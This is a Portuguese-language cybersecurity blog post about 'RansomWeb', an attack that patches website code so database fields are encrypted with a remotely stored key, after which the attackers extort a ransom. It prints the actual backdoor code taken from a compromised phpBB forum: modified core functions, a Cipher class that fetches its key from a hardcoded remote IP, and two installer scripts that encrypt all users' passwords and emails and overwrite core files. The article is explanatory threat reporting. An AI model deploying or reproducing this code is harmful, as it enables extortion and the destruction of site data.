Cibersegurança · 5 min read · Jan 19, 2026

“RansomWeb” o novo vetor de ataque que criptografa bancos de dados de sites

Pesquisadores da High-Tech Bridge divulgaram uma pesquisa sobre criminosos cibernéticos que estão criptografando bancos de dados de sites e os mantendo como reféns com o “RansomWeb”

Cada vez mais pessoas se tornam vítimas de ransomware, um malware que criptografa seus dados e exige dinheiro para descriptografá-los. Uma nova tendência no mercado mostra que os cibercriminosos agora também vão atacar seu site para obter um pagamento de resgate de você.

Em dezembro de 2014, especialistas em segurança da High-Tech Bridge descobriram um caso muito interessante de comprometimento de um site de uma empresa financeira: o site estava fora do ar exibindo um erro de banco de dados, enquanto o proprietário do site recebeu um e-mail pedindo um resgate para “descriptografar o banco de dados”. A aplicação web em questão era bastante simples e pequena, mas muito importante para os negócios da empresa – a empresa não podia se dar ao luxo de suspender, nem de anunciar seu comprometimento. Uma investigação cuidadosa da High-Tech Bridge revelou o seguinte:

  • A aplicação web foi comprometida há seis meses, vários scripts do servidor foram modificados para criptografar dados antes de inseri-los no banco de dados e para descriptografá-los após obter dados do banco de dados. Uma espécie de patch “on-fly” invisível para os usuários da aplicação web.

  • Apenas os campos mais críticos das tabelas do banco de dados foram criptografados (provavelmente para não impactar muito o desempenho da aplicação web). Todos os registros de banco de dados existentes anteriormente foram criptografados de acordo.

  • A chave de criptografia foi armazenada em um servidor web remoto acessível apenas via HTTPS (provavelmente para evitar a interceptação da chave por vários sistemas de monitoramento de tráfego).

  • Durante seis meses, os hackers esperaram silenciosamente, enquanto os backups eram sobrescritos pelas versões recentes do banco de dados.

  • No dia X, os hackers removeram a chave do servidor remoto. O banco de dados se tornou inutilizável, o site ficou fora do ar e os hackers exigiram um resgate pela chave de criptografia.

Os pesquisadores afirmaram que estavam certos de que era um exemplo individual de um APT sofisticado visando uma empresa específica, no entanto, na semana passada, eles enfrentaram outro caso semelhante. Um de seus clientes, uma PME, foi chantageado após seu… fórum phpBB ficar fora do ar. O fórum era usado como a principal plataforma de suporte ao cliente e, portanto, era importante para o cliente.

Era a versão mais recente do phpBB 3.1.2 lançada em 25 de novembro de 2014. Nenhum usuário conseguia fazer login (incluindo moderadores e administradores do fórum). O fórum estava online, no entanto, todas as funções que requeriam que o usuário do fórum estivesse autenticado não funcionavam. Nossa investigação minuciosa revelou que o mecanismo do fórum foi patchado de tal forma que as senhas e e-mails dos usuários foram criptografados “on-fly” entre a aplicação web e o banco de dados.

Os seguintes arquivos foram modificados:

  1. O arquivo “factory.php” teve sua função “sql_fetchrow()” modificada de tal maneira que o resultado da consulta SQL “$result = $this->get_driver()->sql_fetchrow($query_id);” no array “result” terá valores descriptografados dos campos “user_password” e “user_email”:
    if(isset($result[‘user_password’])){
    $result[‘user_password’] = $cipher->decrypt($result[‘user_password’]);
    }
    if(isset($result[‘user_email’])){
    $result[‘user_email’] = $cipher->decrypt($result[‘user_email’]);
    }
  2. O arquivo “functions_user.php” tem uma versão modificada da função “user_add” para adicionar criptografia:
    $sql_ary = array(
    ‘username’=>$user_row[‘username’],
    ‘username_clean’ => $username_clean,
    ‘user_password’ => (isset($user_row[‘user_password’]))?
    $cipher->encrypt($user_row[‘user_password’]):$cipher->encrypt(”),
    ‘user_email’=> $cipher->encrypt(strtolower($user_row[‘user_email’])),
    ‘user_email_hash’=> phpbb_email_hash($user_row[‘user_email’]),
    ‘group_id’ => $user_row[‘group_id’],
    ‘user_type’ => $user_row[‘user_type’],
    );
  3. O arquivo “cp_activate.php” tem uma versão modificada da função “main()”:
    $sql_ary = array(
    ‘user_actkey’ => ”,
    ‘user_password’ => $cipher->encrypt($user_row[‘user_newpasswd’]),
    ‘user_newpasswd’ => ”,
    ‘user_login_attempts’ => 0,
    );
  4. O arquivo “ucp_profile.php” tem uma versão modificada da função “main()”:
    if (sizeof($sql_ary))
    {
    $sql_ary[‘user_email’] = $cipher->encrypt($sql_ary[‘user_email’]);
    $sql_ary[‘user_password’] = $cipher->encrypt($sql_ary[‘user_password’]);
    $sql = ‘UPDATE ‘ . USERS_TABLE . ‘
    SET ‘ . $db->sql_build_array(‘UPDATE’, $sql_ary) . ‘
    WHERE user_id = ‘ . $user->data[‘user_id’];
    $db->sql_query($sql);
    }
  5. O arquivo “config.php” teve a seguinte modificação:
    class Cipher {
    private $securekey, $iv;
    function __construct($textkey) {
    $this->securekey = hash(‘sha256’,$textkey,TRUE);
    $this->iv = mcrypt_create_iv(32);
    }
    function encrypt($input) {
    return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
    $this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
    }
    function decrypt($input) {
    return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
    $this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
    }
    }
    $key=file_get_contents(‘https://103.13.120.108/sfdoif89d7sf8d979dfgf/
    sdfds90f8d9s0f8d0f89.txt’);
    $cipher=new Cipher($key);

Além disso, os pesquisadores encontraram dois scripts de instalação de backdoor deixados pelos hackers no servidor que permitem backdoor em qualquer fórum phpBB com apenas alguns cliques. O primeiro instalador patcha o arquivo “config.php” para adicionar a classe “Cipher” que descriptografa e criptografa os dados com a função PHP “mcrypt_encrypt()” armazenando a chave de criptografia em um servidor remoto:

$file = ‘../config.php’;
$txt = “ ”.’class Cipher {
private $securekey, $iv;
function construct($textkey) {
$this->securekey = hash(\’sha256\’,$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
}
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
}
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
}
}
$key=file_get_contents(\’https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt\’);
$cipher=new Cipher($key);’.” ”;
if( FALSE !== file_put_contents($file, $txt, FILE_APPEND | LOCK_EX)){
echo “DONE!”;
}; E o segundo instalador analisa todos os usuários phpBB existentes para criptografar seus e-mails e senhas, e substitui os arquivos phpBB mencionados acima por cópias com backdoor:
define(‘IN_PHPBB’, true);
$phpbb_root_path = (defined(‘PHPBB_ROOT_PATH’)) ? PHPBB_ROOT_PATH : ‘../’;
$phpEx = substr(strrchr(FILE__, ‘.’), 1);
include($phpbb_root_path . ‘common.’ . $phpEx);
include($phpbb_root_path . ‘includes/functions_display.’ . $phpEx);
$sql = ‘SELECT user_id, user_password, user_email FROM ‘ . USERS_TABLE;
$result = $db->sql_query($sql);
while ($row = $db->sql_fetchrow($result))
{
$sql2 = ‘UPDATE ‘ . USERS_TABLE . ‘
SET
user_password = “‘.$cipher->encrypt($row[‘user_password’]).’”,
user_email = “‘.$cipher->encrypt($row[‘user_email’]).’”
WHERE user_id = ‘.$row[‘user_id’];
$result2 = $db->sql_query($sql2);
}
echo “SQL UPDATED!
”;
copy(‘factory.php’, ‘../phpbb/db/driver/factory.php’);
copy(‘functions_user.php’, ‘../includes/functions_user.php’);
copy(‘ucp_activate.php’, ‘../includes/ucp/ucp_activate.php’);
copy(‘ucp_profile.php’, ‘../includes/ucp/ucp_profile.php’);
echo “FILES UPDATED!”;

Os atacantes esperaram dois meses e então simplesmente removeram a chave do servidor remoto. Os pesquisadores da High-Tech Bridge descobriram mais tarde que o phpBB foi comprometido via senha FTP roubada.
No momento, nenhum software antivírus detecta nem mesmo os instaladores como um malware conhecido:
“step1.php” file
“step2.php” file

Seguindo a onda de ataques de Ransomware, os pesquisadores nomearam essa técnica de hacking de “RansomWeb”.

  • Vamos tentar fazer uma breve análise dos ataques RansomWeb:

  • Oportunidades Potenciais do RansomWeb:

  • Diferentemente dos ataques DDoS, eles podem ter um impacto duradouro na disponibilidade da aplicação web.

  • Podem ser usados não apenas para extorsão, mas para destruição a longo prazo do site.

  • Backups podem não ajudar muito, pois o banco de dados será backupado em modo criptografado, enquanto a chave de criptografia é armazenada remotamente e não será backupada.

  • Quase impossível se recuperar do ataque sem pagar o resgate, muitas vítimas não terão escolha a não ser pagar os hackers.

  • As empresas de hospedagem não estão preparadas para esse novo desafio e provavelmente não poderão ajudar seus clientes.

Os pesquisadores também identificaram as Fraquezas Potenciais do “RansomWeb” que são dadas abaixo:

  • Pode ser facilmente detectado por um monitor de integridade de arquivos (no entanto, muito poucas empresas fazem monitoramento de integridade de arquivos para aplicações web que podem mudar todos os dias).

  • Bastante difícil criptografar todo o banco de dados sem danificar a funcionalidade e/ou velocidade da aplicação web (no entanto, mesmo um campo de DB que seja irrecuperável pode arruinar uma aplicação web).

  • Pode ser detectado rapidamente quando usado em aplicações web que são atualizadas regularmente.

Fonte: High-Tech Bridge

Share: X/Twitter LinkedIn
#Cibersegurança

Receba novas postagens na sua caixa de entrada

Sem spam. Cancele a assinatura a qualquer momento.